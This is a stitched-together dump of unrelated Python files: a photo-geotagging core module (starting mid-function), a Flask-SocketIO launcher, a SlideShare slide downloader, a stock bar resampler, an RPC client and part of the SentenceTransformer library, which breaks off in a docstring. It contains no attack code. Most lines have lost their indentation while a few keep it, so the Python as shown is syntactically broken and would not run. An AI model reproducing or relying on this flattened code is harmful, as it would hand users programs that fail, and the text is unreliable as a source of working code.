elif gvalue == PhotoPlace_default:
value = default
else:
value = float(gvalue)
else:
raise TypeError
except:
dgettext = dict()
dgettext['attr'] = key
msg_warning = _("Warning processing geophoto number attribute '%(attr)s': type not valid!")
self.logger.debug(msg_warning % dgettext)
return value
# ####################
    # Log Observers Section
# ####################
def addlogObserver(self, observer, loglevel=[logging.INFO], *args):
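        # A non-empty loglevel list means the observer only receives records whose
        # levelno is in that list; an empty list lets every record through.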
if loglevel:
observer.filters = [ lambda rec, l: rec.levelno in l ]
else:
observer.filters = [ lambda record, thing : True ]
self.mainloghandler.addObserver(observer, loglevel, *args)
def dellogObserver(self, observer):
self.mainloghandler.delObserver(observer)
# ###############################
# Notifiers and observers Section
# ###############################
def _setObservers(self, action):
events = [
action.__class__.action_ini_event(),
action.__class__.action_run_event(),
action.__class__.action_end_event(),
action.__class__.action_start_event(),
action.__class__.action_startgo_event(),
action.__class__.action_finishgo_event(),
action.__class__.action_finish_event(),
]
for event in self.observers.keys():
pattern = re.compile(event)
for action_event in events:
if pattern.match(action_event):
for (observer, args) in self.observers[event]:
if action.hasObserver(observer):
action.addObserver(observer, action_event, *args)
else:
action.addObserver(observer, [action_event], *args)
for event in events:
action.addObserver(
self.pluginmanager.trigger, event, self.pluginmanager, event)
def addNotifier(self, observer, eventlist=['.*'], *args):
if callable(observer):
for event in eventlist:
if not self.observers.has_key(event):
self.observers[event] = []
self.observers[event].append((observer, args))
else:
raise TypeError('Object is not callable!')
def delEvent(self, event):
if event in self.observers.keys():
del self.observers[event]
return True
return False
def delNotifier(self, observer, event=None):
for e in self.observers.keys():
if not event:
event = e
if e == event:
positions = []
                position = 0
                for (ob, args) in self.observers[e]:
                    if ob == observer:
                        positions.append(position)
                    position += 1
                # Pop from the end so earlier indexes remain valid.
                for position in reversed(positions):
                    self.observers[e].pop(position)
# #########################
# Plugin Management Section
# #########################
def load_plugins(self):
errors = {}
for plugin, path in self.addons.iteritems():
path = os.path.expanduser(path)
path = os.path.expandvars(path)
path = os.path.normpath(path)
if not isinstance(path, unicode):
try:
path = unicode(path, PLATFORMENCODING)
except:
pass
if not os.path.isdir(path):
new_path = os.path.join(self.state.resourcedir_user, path)
if not os.path.isdir(new_path):
path = os.path.join(self.state.resourcedir, path)
else:
path = new_path
try:
self.pluginmanager.load(plugin, path)
except Plugins.pluginManager.PluginManagerError as pluginerror:
msg = str(pluginerror)
self.logger.error(msg)
tip = _("Check if addon syntax is correct ... ")
errors[plugin] = Error(msg, tip, "PluginManagerError")
except ValueError as valueerror:
msg = str(valueerror)
self.logger.error(msg)
return errors
def activate_plugins(self, capability='*', *args):
errors = {}
plugins = self.list_plugins(capability)
for plg in plugins:
try:
self.pluginmanager.activate(plugins[plg], self, self.args, self.argfiles, *args)
except Plugins.pluginManager.PluginManagerError as pluginerror:
msg = str(pluginerror)
self.logger.error(msg)
tip = _("Check addon base class ... ")
errors[plg] = Error(msg, tip, "PluginManagerError")
return errors
def activate_plugin(self, plugin, *args):
plugins = self.list_plugins(plugin=plugin)
if plugin in plugins:
try:
self.pluginmanager.activate(plugins[plugin], self, self.args, self.argfiles, *args)
except Plugins.pluginManager.PluginManagerError as pluginerror:
msg = str(pluginerror)
self.logger.error(msg)
tip = _("Check addon base class ... ")
return Error(msg, tip, "PluginManagerError")
return None
def unload_plugins(self, capability='*', plugin=None):
self.end_plugin(plugin, capability)
plugins = self.list_plugins(capability, plugin)
for plg in plugins:
self.pluginmanager.deactivate(plugins[plg])
def list_plugins(self, capability='*', plugin=None):
plugins = {}
cap = None
if not capability == '*':
cap = capability
for plg in self.pluginmanager.get_plugins(cap):
if plugin != None:
if plg.__module__ == plugin:
plugins[plg.__module__] = plg
else:
plugins[plg.__module__] = plg
return plugins
def init_plugin(self, plugin=None, capability='*', *args):
if self.finalize:
msg = _("Cannot initiate addon while some operations are pending ...")
self.logger.error(msg)
tip = _("Wait a moment ... ")
raise Error(msg, tip, "Error")
plugins = self.list_plugins(capability, plugin)
value = None
for plg in plugins.keys():
try:
value = self.pluginmanager.init(plugins[plg], self.options, *args)
except Plugins.pluginManager.PluginManagerError as pluginerror:
msg = str(pluginerror)
self.logger.error(msg)
tip = _("Check 'Plugin.init' method ... ")
raise Error(msg, tip, "PluginManagerError")
return value
def reset_plugin(self, plugin=None, capability='*', *args):
if self.finalize:
msg = _("Cannot reset addon while some operations are pending ...")
self.logger.error(msg)
tip = _("Wait a moment ... ")
raise Error(msg, tip, "Error")
plugins = self.list_plugins(capability, plugin)
value = None
for plg in plugins.keys():
try:
value = self.pluginmanager.reset(plugins[plg], *args)
except Plugins.pluginManager.PluginManagerError as pluginerror:
msg = str(pluginerror)
self.logger.error(msg)
tip = _("Check 'Plugin.reset' method ... ")
raise Error(msg, tip, "PluginManagerError")
return value
def end_plugin(self, plugin=None, capability='*', *args):
if self.finalize:
msg = _("Cannot finish addon while some operations are pending ...")
self.logger.error(msg)
tip = _("Wait a moment ... ")
raise Error(msg, tip, "Error")
plugins = self.list_plugins(capability, plugin)
value = None
for plg in plugins.keys():
try:
value = self.pluginmanager.end(plugins[plg], self.options, *args)
except Plugins.pluginManager.PluginManagerError as pluginerror:
msg = str(pluginerror)
self.logger.error(msg)
tip = _("Check 'Plugin.end' method ... ")
raise Error(msg, tip, "PluginManagerError")
return value
# ####################
# User Actions Section
# ####################
def Clear(self):
if self.finalize:
msg = _("Cannot clear state while some operations are pending ...")
self.logger.error(msg)
tip = _("Wait a moment ... ")
raise Error(msg, tip, "Error")
else:
if self.state:
self.state.clear()
return None
def DoTemplates(self):
if self.finalize:
return None
dotemplates = Actions.doTemplatesAction.DoTemplates(self.state, self.options)
self._setObservers(dotemplates)
return dotemplates
def LoadPhotos(self, directory=u''):
if self.finalize:
return None
if directory != self.state['photoinputdir']:
self.state['photoinputdir'] = directory
loadphotos = Actions.loadPhotosAction.LoadPhotos(self.state)
self._setObservers(loadphotos)
return loadphotos
return None
def ReadGPX(self, filename=u''):
if filename != self.state['gpxinputfile']:
self.state['gpxinputfile'] = filename
readgpx = Actions.readGPXAction.ReadGPX(self.state)
self._setObservers(readgpx)
return readgpx
return None
def Geolocate(self):
if self.finalize:
return None
geolocate = Actions.geolocateAction.Geolocate(self.state)
self._setObservers(geolocate)
return geolocate
def MakeKML(self):
if self.finalize:
return None
makekml = Actions.makeKMLAction.MakeKML(self.state, self.options['defaults'])
self._setObservers(makekml)
return makekml
def WriteExif(self):
if self.finalize:
return None
writeexif = Actions.writeExifAction.WriteExif(self.state)
self._setObservers(writeexif)
return writeexif
def SaveFiles(self):
if self.finalize:
return None
savefiles = Actions.saveFilesAction.SaveFiles(self.state)
self._setObservers(savefiles)
return savefiles
def WriteCopySave(self):
if self.finalize:
return None
writefiles = threading.Thread(target=self._WriteCopySave)
return writefiles
def _WriteCopySave(self):
if self.finalize:
return False
self.finalize = True
if self.state['exifmode'] != -1:
write = Actions.writeExifAction.WriteExif(self.state)
self._setObservers(write)
write.run()
if self.state.outputdir:
save = Actions.saveFilesAction.SaveFiles(self.state)
self._setObservers(save)
save.run()
self.finalize = False
return True
def goprocess(self, wait=False):
if self.finalize:
msg = _("Some operations are pending ...")
self.logger.error(msg)
tip = _("Wait a moment ... ")
raise Error(msg, tip, "Error")
if self.state.outputdir:
try:
os.makedirs(self.state.outputdir)
except OSError as exception:
# dir exists !?
pass
except Exception as exception:
dgettext = dict()
dgettext['error'] = str(exception)
dgettext['outputkml'] = self.state.outputdir.encode(PLATFORMENCODING)
msg = _("Cannot make dir '%(outputkml)s': %(error)s.") % dgettext
self.logger.error(msg)
tip = _("Check if that directory exists or is writable.")
                raise Error(msg, tip, exception.__class__.__name__)
if wait:
self.MakeKML().run()
self.WriteCopySave().run()
else:
self.MakeKML().start()
self.WriteCopySave().start()
# EOF
|
run.py
|
#!/usr/bin/env python3
try:
import eventlet
eventlet.monkey_patch()
print('Using eventlet')
create_thread_func = lambda f: f
start_thread_func = lambda f: eventlet.spawn(f)
except ImportError:
try:
import gevent
import gevent.monkey
gevent.monkey.patch_all()
print('Using gevent')
create_thread_func = lambda f: gevent.Greenlet(f)
start_thread_func = lambda t: t.start()
except ImportError:
import threading
print('Using threading')
create_thread_func = lambda f: threading.Thread(target=f)
start_thread_func = lambda t: t.start()
from app import socketio, app
from config import DEBUG
from models import db_init
db_init()
socketio.run(app, debug=DEBUG)
|
slideshare_downloader.py
|
# slideshare downloader
from bs4 import BeautifulSoup
import requests
import itertools
import threading
import time
import sys
import urllib.request
import img2pdf
import os
task = False
process = "getting the slides "
def animate():
for i in itertools.cycle(['|', '/', '-', '\\']):
if task:
break
sys.stdout.write('\r' + process + i)
sys.stdout.flush()
time.sleep(0.1)
t = threading.Thread(target=animate)
def get_image_list(url):
code = requests.get(url)
soup = BeautifulSoup(code.text, "html.parser")
print(f"Title: {soup.title.get_text()}")
imgs = soup.find_all("img")
img_urls = []
for temp_url in imgs:
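        # "data-full" appears to be the attribute SlideShare uses for the
        # full-resolution slide image URL; <img> tags without it are skipped.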
temp_link = temp_url.get("data-full")
if temp_link is not None:
img_urls.append(temp_link)
return img_urls
def slides_capture(links):
pg_no = 1
os.makedirs(".cache", exist_ok=True)
all_slides = []
for link in links:
print(f"fetching (slide{pg_no})")
file = f"slide{pg_no}.jpg"
urllib.request.urlretrieve(link, ".cache/"+file)
all_slides.append(".cache/"+file)
pg_no = pg_no+1
return all_slides
def combine(all_slides):
output_name = input(
"\n\n Enter the name for pdf file of slides (without extension):")
with open(output_name+".pdf", "wb") as f:
f.write(img2pdf.convert(all_slides))
for i in all_slides:
os.remove(i)
print("Enter the URL of slides below:")
main_link = input()
t.start()
all_urls = get_image_list(main_link)
if len(all_urls) == 0:
print("Sorry no downloadable slides found")
task = True
else:
print(f"Total no of Slides found: {len(all_urls)}")
all_slides = slides_capture(all_urls)
task = True
combine(all_slides)
print("All set your file is ready")
|
stock_resampler.py
|
# **************************************************************************** #
# #
# ::: :::::::: #
# stockResampler.py :+: :+: :+: #
# +:+ +:+ +:+ #
# By: zhongjy1992 <zhongjy1992@outlook.com> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2020/03/03 22:19:37 by zhongjy1992 #+# #+# #
# Updated: 2020/03/06 14:06:35 by zhongjy1992 ### ########.fr #
# #
# **************************************************************************** #
import datetime
import json
import logging
import logging.config
import multiprocessing
import os
import threading
import time
import click
import pandas as pd
from QAPUBSUB.consumer import subscriber, subscriber_routing
from QAPUBSUB.producer import publisher
from QARealtimeCollector.setting import eventmq_ip
from QUANTAXIS.QAEngine.QAThreadEngine import QA_Thread
from QARealtimeCollector.utils.common import create_empty_stock_df, tdx_stock_bar_resample_parallel, util_is_trade_time, \
get_file_name_by_date, logging_csv, util_to_json_from_pandas
logger = logging.getLogger(__name__)
class QARTCStockBarResampler(QA_Thread):
"""
    A dedicated thread should resample the 1min data on its own; the 1min data is then
    resampled on demand into bars of other periods.
    If an in-memory database were available, the data could be written there first and
    pulled afterwards according to the subscriptions (redis, mongo?).
"""
def __init__(self, frequency='5min', date: datetime.datetime = None, log_dir='./log'):
"""
        Resampling a single stock is not supported yet.
:param frequency:
"""
super().__init__()
logger.info("QA实时股票Bar重采样,初始化...周期: %s" % frequency)
if isinstance(frequency, float):
self.frequency = int(frequency)
elif isinstance(frequency, str):
_frequency = frequency.replace('min', '')
if str.isnumeric(_frequency):
self.frequency = int(_frequency)
else:
logger.error("不支持的周期 unknownFrequency: %s" % frequency)
return
elif isinstance(frequency, int):
self.frequency = frequency
else:
logger.error("不支持的周期 unknownFrequency: %s" % frequency)
return
self.market_data = None
        # receive the stock tick data
self.sub = subscriber(
host=eventmq_ip, exchange='realtime_stock_min')
self.sub.callback = self.on_message_callback
self.stock_sub = subscriber_routing(host=eventmq_ip, exchange='QARealtime_Market', routing_key='stock')
self.stock_sub.callback = self.on_stock_subscribe_message_callback
        # publish the resampled data
self.pub = publisher(host=eventmq_ip, exchange='realtime_stock_{}_min'.format(self.frequency))
self.count = 0
self.code_list = []
cur_time = datetime.datetime.now() if date is None else date
self.cur_year = cur_time.year
self.cur_month = cur_time.month
self.cur_day = cur_time.day
        # multi-process computation
self.cpu_count = multiprocessing.cpu_count() - 1
self.log_dir = log_dir
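        # Consume both subscriptions in background daemon threads so that run()
        # below can keep polling the clock without blocking on messages.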
threading.Thread(target=self.sub.start, daemon=True).start()
threading.Thread(target=self.stock_sub.start, daemon=True).start()
def publish_msg(self, text):
self.pub.pub(text)
def on_stock_subscribe_message_callback(self, channel, method, properties, data):
data = json.loads(data)
if data['topic'].lower() == 'subscribe':
logger.info('股票重采样,新的订阅: {}'.format(data['code']))
new_ins = data['code'].replace('_', '.').split(',')
if isinstance(new_ins, list):
for item in new_ins:
self.subscribe_callback(item)
else:
self.subscribe_callback(new_ins)
if data['topic'].lower() == 'unsubscribe':
logger.info('股票重采样,取消订阅: {}'.format(data['code']))
new_ins = data['code'].replace('_', '.').split(',')
if isinstance(new_ins, list):
for item in new_ins:
self.unsubscribe_callback(item)
else:
self.unsubscribe_callback(new_ins)
def subscribe_callback(self, code):
if code not in self.code_list:
self.code_list.append(code)
# initial time series data
# date=datetime.datetime(2019, 5, 9)
self.market_data = pd.concat([
self.market_data, create_empty_stock_df(code, date=datetime.datetime(self.cur_year, self.cur_month,
self.cur_day))
])
logger.info("当日数据初始化中,%s" % code)
pass
def unsubscribe_callback(self, item):
# remove code from market data
pass
def on_message_callback(self, channel, method, properties, body):
# context = pd.read_msgpack(body)
context = pd.DataFrame(json.loads(body))
# merge update
if self.market_data is None:
# self.market_data = context
pass
else:
logger.info("Before market_data, concat and update start, 合并市场数据")
cur_time = datetime.datetime.now()
self.market_data.update(context)
end_time = datetime.datetime.now()
cost_time = (end_time - cur_time).total_seconds()
logger.info("Before market_data, concat and update end, 合并市场数据, 耗时,cost: %s s" % cost_time)
logger.info(self.market_data.to_csv(float_format='%.3f'))
filename = get_file_name_by_date('stock.market.%s.csv', self.log_dir)
            # overwrite, do not append
logging_csv(self.market_data, filename, index=True, mode='w')
# group by code and resample
try:
cur_time = datetime.datetime.now()
bar_data: pd.DataFrame = tdx_stock_bar_resample_parallel(
self.market_data[self.market_data.close > 0], self.frequency, jobs=self.cpu_count
)
end_time = datetime.datetime.now()
cost_time = (end_time - cur_time).total_seconds()
logger.info("数据重采样耗时,cost: %s" % cost_time)
logger.info("发送重采样数据中start")
# self.publish_msg(bar_data.to_msgpack())
self.publish_msg(util_to_json_from_pandas(bar_data))
logger.info("发送重采样数据完毕end")
logger.info(bar_data.to_csv(float_format='%.3f'))
filename = get_file_name_by_date('stock.bar.%s.csv', self.log_dir)
            # overwrite, do not append
logging_csv(bar_data, filename, index=True, mode='w')
del bar_data
except Exception as e:
logger.error("failure股票重采样数据. " + e.__str__())
finally:
logger.info("重采样计数 count : %s" % self.count)
self.count += 1
del context
def run(self):
while True:
            # fetch data during 9:15 - 11:31 and 12:58 - 15:00
cur_time = datetime.datetime.now()
            if util_is_trade_time(cur_time):  # if within trading hours
time.sleep(0.2)
else:
time.sleep(1)
@click.command()
# @click.argument()
@click.option('-F', '--frequency', default='5min', help='calculate frequency', type=click.STRING)
@click.option('-log', '--logfile', help="log file path", type=click.Path(exists=False))
@click.option('-log_dir', '--log_dir', help="log path", type=click.Path(exists=False))
def main(frequency: str, logfile: str = None, log_dir: str = None):
try:
from QARealtimeCollector.utils.logconf import update_log_file_config
logfile = 'stock.resample.log' if logfile is None else logfile
log_dir = '' if log_dir is None else log_dir
logging.config.dictConfig(update_log_file_config(logfile))
except Exception as e:
print(e.__str__())
    # TODO: support codelist file
QARTCStockBarResampler(frequency=frequency, log_dir=log_dir.replace('~', os.path.expanduser('~'))).run()
if __name__ == '__main__':
main()
|
Client.py
|
import socket
import logging
import time, datetime
import rpyc
import psutil, platform
from re import finditer
from Languages.Server_lang import lang
from multiprocessing import Manager
from Clients import *
from os import listdir
from collections import defaultdict
try:
import Server
except ImportError: pass
def main():
import sys
logging.basicConfig(format="%(asctime)s %(levelname)s | %(message)s", level=logging.DEBUG)
ip = input("ip: ") or "127.0.0.1"
port = input("port: ") or 12412
protocol = input("protocol: ") or "RPC"
cl = Client(ip, port, {}, protocol=protocol)
cl.open()
conn = cl.server.server
s = cl.server
conn.serve_all()
class Client():
def __init__(self, ip:str="localhost", port:int=12412, order_dict:dict={}, protocol="TCP"):
logging.debug(f"Client.__init__(self)")
logging.info("Created new client")
self.listener = None
self.protocol = protocol.upper()
self.__clients_const_by_str = {mod[:-3]: eval(f"{mod[:-3]}.{mod[:-3]}") for mod in listdir(f"{__file__[:-9]}Clients") if mod.endswith('.py') and mod != "__init__.py"}
self.ip = str(ip)
self.port = int(port)
self.order_dict = {**order_dict,
"--_ping":self.ping,"--_recon":self.change_server
}
self.server = self.__clients_const_by_str[protocol](ip=self.ip, port=self.port,
order_dict=self.order_dict)
self.conn_step = [lang.Serv_to_Client]
self.__manager = Manager()
try:
Server.Process(target=lambda x: x, args=(1,))
self.__can_be_server = True
except Exception:
self.__can_be_server = False
self.next_server = self.__manager.list()
def __enter__(self):
self.open()
def __exit__(self,_,__,___):
self.close()
def open(self):
self.server.open()
def close(self):
self.server.close()
def change_server(self, ip:str, port:int):
self.server.change_server(ip,port)
def ping(self):
self.server.ping()
if __name__ == "__main__":
main()
|
SentenceTransformer.py
|
import json
import logging
import os
import shutil
from collections import OrderedDict
from typing import List, Dict, Tuple, Iterable, Type, Union, Callable
from zipfile import ZipFile
import requests
import numpy as np
import transformers
import torch
from numpy import ndarray
from torch import nn, Tensor, device
from torch.optim import Optimizer
from torch.utils.data import DataLoader
from tqdm.autonotebook import tqdm, trange
import torch.multiprocessing as mp
import math
import queue
from . import __DOWNLOAD_SERVER__
from .evaluation import SentenceEvaluator
from .util import import_from_string, batch_to_device, http_get
from .datasets.EncodeDataset import EncodeDataset
from .models import Transformer, Pooling
from . import __version__
class SentenceTransformer(nn.Sequential):
"""
Loads or creates a SentenceTransformer model that can be used to map sentences / text to embeddings.
:param model_name_or_path: If it is a filepath on disc, it loads the model from that path. If it is not a path, it first tries to download a pre-trained SentenceTransformer model. If that fails, tries to construct a model from Huggingface models repository with that name.
:param modules: This parameter can be used to create custom SentenceTransformer models from scratch.
:param device: Device (like 'cuda' / 'cpu') that should be used for computation. If None, checks if a GPU can be used.
"""
def __init__(self, model_name_or_path: str = None, modules: Iterable[nn.Module] = None, device: str = None):
if model_name_or_path is not None and model_name_or_path != "":
logging.info("Load pretrained SentenceTransformer: {}".format(model_name_or_path))
model_path = model_name_or_path
if not os.path.isdir(model_path) and not model_path.startswith('http://') and not model_path.startswith('https://'):
logging.info("Did not find folder {}. Assume to download model from server.".format(model_path))
model_path = __DOWNLOAD_SERVER__ + model_path + '.zip'
if model_path.startswith('http://') or model_path.startswith('https://'):
model_url = model_path
folder_name = model_url.replace("https://", "").replace("http://", "").replace("/", "_")[:250].rstrip('.zip')
try:
from torch.hub import _get_torch_home
torch_cache_home = _get_torch_home()
except ImportError:
torch_cache_home = os.path.expanduser(
os.getenv('TORCH_HOME', os.path.join(
os.getenv('XDG_CACHE_HOME', '~/.cache'), 'torch')))
default_cache_path = os.path.join(torch_cache_home, 'sentence_transformers')
model_path = os.path.join(default_cache_path, folder_name)
os.makedirs(model_path, exist_ok=True)
if not os.listdir(model_path):
if model_url[-1] == "/":
model_url = model_url[:-1]
logging.info("Downloading sentence transformer model from {} and saving it at {}".format(model_url, model_path))
try:
zip_save_path = os.path.join(model_path, 'model.zip')
http_get(model_url, zip_save_path)
with ZipFile(zip_save_path, 'r') as zip_file:
    zip_file.extractall(model_path)
os.remove(zip_save_path)
except requests.exceptions.HTTPError as e:
shutil.rmtree(model_path)
if e.response.status_code == 404:
logging.warning('SentenceTransformer-Model {} not found. Try to create it from scratch'.format(model_url))
logging.warning('Try to create Transformer Model {} with mean pooling'.format(model_name_or_path))
model_path = None
transformer_model = Transformer(model_name_or_path)
pooling_model = Pooling(transformer_model.get_word_embedding_dimension())
modules = [transformer_model, pooling_model]
else:
raise e
except Exception as e:
shutil.rmtree(model_path)
raise e
#### Load from disk
if model_path is not None:
logging.info("Load SentenceTransformer from folder: {}".format(model_path))
if os.path.exists(os.path.join(model_path, 'config.json')):
with open(os.path.join(model_path, 'config.json')) as fIn:
config = json.load(fIn)
if config['__version__'] > __version__:
logging.warning("You try to use a model that was created with version {}, however, your version is {}. This might cause unexpected behavior or errors. In that case, try to update to the latest version.\n\n\n".format(config['__version__'], __version__))
with open(os.path.join(model_path, 'modules.json')) as fIn:
contained_modules = json.load(fIn)
modules = OrderedDict()
for module_config in contained_modules:
module_class = import_from_string(module_config['type'])
module = module_class.load(os.path.join(model_path, module_config['path']))
modules[module_config['name']] = module
if modules is not None and not isinstance(modules, OrderedDict):
modules = OrderedDict([(str(idx), module) for idx, module in enumerate(modules)])
super().__init__(modules)
if device is None:
device = "cuda" if torch.cuda.is_available() else "cpu"
logging.info("Use pytorch device: {}".format(device))
self._target_device = torch.device(device)
def encode(self, sentences: Union[str, List[str], List[int]],
batch_size: int = 32,
show_progress_bar: bool = None,
output_value: str = 'sentence_embedding',
convert_to_numpy: bool = True,
convert_to_tensor: bool = False,
is_pretokenized: bool = False,
device: str = None,
num_workers: int = 0) -> Union[List[Tensor], ndarray, Tensor]:
"""
Computes sentence embeddings
:param sentences: the sentences to embed
:param batch_size: the batch size used for the computation
:param show_progress_bar: Output a progress bar when encoding sentences
:param output_value: Default sentence_embedding, to get sentence embeddings. Can be set to token_embeddings to get wordpiece token embeddings.
:param convert_to_numpy: If true, the output is a list of numpy vectors. Else, it is a list of pytorch tensors.
:param convert_to_tensor: If true, you get one large tensor as return. Overwrites any setting from convert_to_numpy
:param is_pretokenized: If is_pretokenized=True, sentences must be a list of integers, containing the tokenized sentences with each token convert to the respective int.
:param device: Which torch.device to use for the computation
:param num_workers: Number of background-workers to tokenize data. Set to positive number to increase tokenization speed
:return:
By default, a list of tensors is returned. If convert_to_tensor, a stacked tensor is returned. If convert_to_numpy, a numpy matrix is returned.
"""
self.eval()
if show_progress_bar is None:
show_progress_bar = (logging.getLogger().getEffectiveLevel()==logging.INFO or logging.getLogger().getEffectiveLevel()==logging.DEBUG)
input_was_string = False
if isinstance(sentences, str): #Cast an individual sentence to a list with length 1
sentences = [sentences]
input_was_string = True
if device is None:
device = self._target_device
self.to(device)
all_embeddings = []
length_sorted_idx = np.argsort([len(sen) for sen in sentences])
sentences_sorted = [sentences[idx] for idx in length_sorted_idx]
inp_dataset = EncodeDataset(sentences_sorted, model=self, is_tokenized=is_pretokenized)
inp_dataloader = DataLoader(inp_dataset, batch_size=batch_size, collate_fn=self.smart_batching_collate_text_only, num_workers=num_workers, shuffle=False)
iterator = inp_dataloader
if show_progress_bar:
iterator = tqdm(inp_dataloader, desc="Batches")
for features in iterator:
for feature_name in features:
features[feature_name] = features[feature_name].to(device)
with torch.no_grad():
out_features = self.forward(features)
embeddings = out_features[output_value]
if output_value == 'token_embeddings':
#Set token embeddings to 0 for padding tokens
input_mask = out_features['attention_mask']
input_mask_expanded = input_mask.unsqueeze(-1).expand(embeddings.size()).float()
embeddings = embeddings * input_mask_expanded
all_embeddings.extend(embeddings)
all_embeddings = [all_embeddings[idx] for idx in np.argsort(length_sorted_idx)]
if convert_to_tensor:
all_embeddings = torch.stack(all_embeddings)
elif convert_to_numpy:
all_embeddings = np.asarray([emb.cpu().detach().numpy() for emb in all_embeddings])
if input_was_string:
all_embeddings = all_embeddings[0]
return all_embeddings
def start_multi_process_pool(self, target_devices: List[str] = None, encode_batch_size: int = 32):
"""
Starts a multi-process pool to run the encoding with several independent processes.
This method is recommended if you want to encode on multiple GPUs. It is advised
to start only one process per GPU. This method works together with encode_multi_process
:param target_devices: PyTorch target devices, e.g. cuda:0, cuda:1... If None, all available CUDA devices will be used
:param encode_batch_size: Batch size for each process when calling encode
:return: Returns a dict with the target processes, an input queue and an output queue.
"""
if target_devices is None:
if torch.cuda.is_available():
target_devices = ['cuda:{}'.format(i) for i in range(torch.cuda.device_count())]
else:
logging.info("CUDA is not available. Start 4 CPU worker")
target_devices = ['cpu']*4
logging.info("Start multi-process pool on devices: {}".format(', '.join(map(str, target_devices))))
ctx = mp.get_context('spawn')
input_queue = ctx.Queue()
output_queue = ctx.Queue()
processes = []
for cuda_id in target_devices:
p = ctx.Process(target=SentenceTransformer._encode_multi_process_worker, args=(cuda_id, self, input_queue, output_queue, encode_batch_size), daemon=True)
p.start()
processes.append(p)
return {'input': input_queue, 'output': output_queue, 'processes': processes}
@staticmethod
def stop_multi_process_pool(pool):
"""
Stops all processes started with start_multi_process_pool
"""
for p in pool['processes']:
p.terminate()
for p in pool['processes']:
p.join()
p.close()
pool['input'].close()
pool['output'].close()
def encode_multi_process(self, sentences: List[str], pool: Dict[str, object], is_pretokenized: bool = False):
"""
This method allows running encode() on multiple GPUs. The sentences are chunked into smaller packages
and sent to individual processes, which encode these on the different GPUs. This method is only suitable
for encoding large sets of sentences
:param sentences: List of sentences
:param pool: A pool of workers started with SentenceTransformer.start_multi_process_pool
:param is_pretokenized: If true, no tokenization will be applied. It is expected that the input sentences are list of ints.
:return: Numpy matrix with all embeddings
"""
chunk_size = min(math.ceil(len(sentences) / len(pool["processes"]) / 10), 5000)
logging.info("Chunk data into packages of size {}".format(chunk_size))
if is_pretokenized:
sentences_tokenized = sentences
else:
sentences_tokenized = map(self.tokenize, sentences)
input_queue = pool['input']
num_chunks = 0
chunk = []
for sentence in sentences_tokenized:
chunk.append(sentence)
if len(chunk) >= chunk_size:
input_queue.put([num_chunks, chunk])
num_chunks += 1
chunk = []
if len(chunk) > 0:
input_queue.put([num_chunks, chunk])
num_chunks += 1
output_queue = pool['output']
results_list = sorted([output_queue.get() for _ in range(num_chunks)], key=lambda x: x[0])
embeddings = np.concatenate([result[1] for result in results_list])
return embeddings
@staticmethod
def _encode_multi_process_worker(target_device: str, model, input_queue, results_queue, encode_batch_size):
"""
Internal working process to encode sentences in multi-process setup
"""
while True:
try:
id, sentences = input_queue.get()
embeddings = model.encode(sentences, device=target_device, is_pretokenized=True, show_progress_bar=False, convert_to_numpy=True, batch_size=encode_batch_size)
results_queue.put([id, embeddings])
except queue.Empty:
break
def get_max_seq_length(self):
"""
Returns the maximal sequence length of inputs the model accepts. Longer inputs will be truncated
"""
if hasattr(self._first_module(), 'max_seq_length'):
return self._first_module().max_seq_length
return None
def tokenize(self, text: str):
"""
Tokenizes the text
"""
return self._first_module().tokenize(text)
def get_sentence_features(self, *features):
return self._first_module().get_sentence_features(*features)
def get_sentence_embedding_dimension(self):
return self._last_module().get_sentence_embedding_dimension()
def _first_module(self):
"""Returns the first module of this sequential embedder"""
return self._modules[next(iter(self._modules))]
def _last_module(self):
"""Returns the last module of this sequential embedder"""
return self._modules[next(reversed(self._modules))]
def save(self, path):
"""
Saves all elements for this seq. sentence embedder into different sub-folders
"""
if path is None:
return
logging.info("Save model to {}".format(path))
contained_modules = []
for idx, name in enumerate(self._modules):
module = self._modules[name]
model_path = os.path.join(path, str(idx)+"_"+type(module).__name__)
os.makedirs(model_path, exist_ok=True)
module.save(model_path)
contained_modules.append({'idx': idx, 'name': name, 'path': os.path.basename(model_path), 'type': type(module).__module__})
with open(os.path.join(path, 'modules.json'), 'w') as fOut:
json.dump(contained_modules, fOut, indent=2)
with open(os.path.join(path, 'config.json'), 'w') as fOut:
json.dump({'__version__': __version__}, fOut, indent=2)
def smart_batching_collate(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
num_texts = len(batch[0][0])
labels = []
paired_texts = [[] for _ in range(num_texts)]
max_seq_len = [0] * num_texts
for tokens, label in batch:
labels.append(label)
for i in range(num_texts):
paired_texts[i].append(tokens[i])
max_seq_len[i] = max(max_seq_len[i], len(tokens[i]))
features = []
for idx in range(num_texts):
max_len = max_seq_len[idx]
feature_lists = {}
for text in paired_texts[idx]:
sentence_features = self.get_sentence_features(text, max_len)
for feature_name in sentence_features:
if feature_name not in feature_lists:
feature_lists[feature_name] = []
feature_lists[feature_name].append(sentence_features[feature_name])
for feature_name in feature_lists:
#feature_lists[feature_name] = torch.tensor(np.asarray(feature_lists[feature_name]))
feature_lists[feature_name] = torch.cat(feature_lists[feature_name])
features.append(feature_lists)
return {'features': features, 'labels': torch.stack(labels)}
def smart_batching_collate_text_only(self, batch):
"""
Transforms a batch from a SmartBatchingDataset to a batch of tensors for the model
:param batch:
a batch from a SmartBatchingDataset
:return:
a batch of tensors for the model
"""
max_seq_len = max([len(text) for text in batch])
feature_lists = {}
for text in batch:
sentence_features = self.get_sentence_features(text, max_seq_len)
for feature_name in sentence_features:
if feature_name not in feature_lists:
feature_lists[feature_name] = []
feature_lists[feature_name].append(sentence_features[feature_name])
for feature_name in feature_lists:
feature_lists[feature_name] = torch.cat(feature_lists[feature_name])
return feature_lists
def fit(self,
train_objectives: Iterable[Tuple[DataLoader, nn.Module]],
evaluator: SentenceEvaluator,
epochs: int = 1,
steps_per_epoch = None,
scheduler: str = 'WarmupLinear',
warmup_steps: int = 10000,
optimizer_class: Type[Optimizer] = transformers.AdamW,
optimizer_params : Dict[str, object]= {'lr': 2e-5, 'eps': 1e-6, 'correct_bias': False},
weight_decay: float = 0.01,
evaluation_steps: int = 0,
output_path: str = None,
output_path_ignore_not_empty: bool = False,
save_best_model: bool = True,
max_grad_norm: float = 1,
use_amp: bool = False,
callback: Callable[[float, int, int], None] = None,
):
"""
Train the model with the given training objective
Each training objective is sampled in turn for one batch.
We sample only as many batches from each objective as there are in the smallest one
to make sure of equal training with each dataset.
